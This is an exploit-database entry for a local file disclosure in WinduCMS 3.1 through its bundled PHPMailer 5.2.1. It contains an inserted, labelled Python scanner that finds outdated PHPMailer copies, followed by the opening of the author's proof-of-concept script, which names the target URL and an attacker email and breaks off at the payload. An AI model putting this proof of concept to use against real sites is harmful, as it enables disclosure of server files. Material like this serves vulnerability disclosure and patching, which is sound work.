WinduCMS 3.1 - Local File Disclosure

Properties

Publication date:
06.12.2017
Target:
WinduCMS 3.1
Impact type:
Disclosure of sensitive data
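
The header of the script below attributes the disclosure to the PHPMailer 5.2.1 copy used by WinduCMS, so a defender's first check is an inventory of bundled PHPMailer copies under a web root. The following is an added example, not part of the original entry or of the exploit author's script; the function names, the constructed sample tree and the version floor are assumptions made for the illustration.

```python
import os
import re
import tempfile

# PHPMailer 5.x declares `public $Version = '5.2.1';` in class.phpmailer.php;
# 6.x declares `const VERSION = '...';` in PHPMailer.php.
VERSION_RE = re.compile(r"""(?:\$Version|const\s+VERSION)\s*=\s*['"](\d+(?:\.\d+)+)['"]""")
CANDIDATES = {"class.phpmailer.php", "phpmailer.php"}

def parse_version(text):
    """Return the declared PHPMailer version as a tuple of ints, or None."""
    m = VERSION_RE.search(text)
    return tuple(int(p) for p in m.group(1).split(".")) if m else None

def find_phpmailer(root, minimum):
    """Walk root; return sorted (relative path, version, outdated) per copy found."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower() not in CANDIDATES:
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                version = parse_version(fh.read())
            if version is None:
                continue  # matching file name, but no PHPMailer version declaration
            hits.append((os.path.relpath(path, root), version, version < minimum))
    return sorted(hits)

def demo():
    """Constructed sample tree: a bundled 5.2.1 copy, a newer copy, and a decoy."""
    with tempfile.TemporaryDirectory() as root:
        samples = {
            "app/lib/phpmailer/class.phpmailer.php": "<?php class PHPMailer {\n  public $Version = '5.2.1';\n}",
            "vendor/phpmailer/phpmailer/src/PHPMailer.php": "<?php class PHPMailer {\n  const VERSION = '6.9.1';\n}",
            "theme/phpmailer.php": "<?php // unrelated file\n",
        }
        for rel, body in samples.items():
            full = os.path.join(root, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "w", encoding="utf-8") as fh:
                fh.write(body)
        # Assumed floor for the demo: it flags the 5.2.1 named on this page.
        # Take the real floor from PHPMailer's own security notices.
        return find_phpmailer(root, minimum=(5, 2, 2))

if __name__ == "__main__":
    for rel, version, outdated in demo():
        print(rel, ".".join(map(str, version)), "OUTDATED" if outdated else "ok")
```

Point `find_phpmailer` at the real document root instead of the constructed tree to list every bundled copy, including ones a package manager does not track.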

Code

#!/usr/bin/python
#
# Exploit Title: WinduCMS <= 3.1 - Local File Disclosure
# Date: 2017-12-03
# Exploit Author: Maciek Krupa
# Vendor Homepage: http://windu.org
# Version: 3.1
# Tested on: Linux Debian 9
#
# // Description //
#   
# Local File Disclosure vulnerability exists in WinduCMS through a vulnerable PHPMailer version 5.2.1 used here
# 
# // PoC //
#
# It requires a contact form present on the website
#
# Example: {{W name=contactForm inputs="name" email="root@localhost"}}
#
 
from requests_toolbelt import MultipartEncoder
import requests
 
print("WinduCMS <= 3.1 Exploit")
  
url = 'http://localhost/contact_page?mn=contactform.message.negative'
email = 'attacker@example.com'
payload = '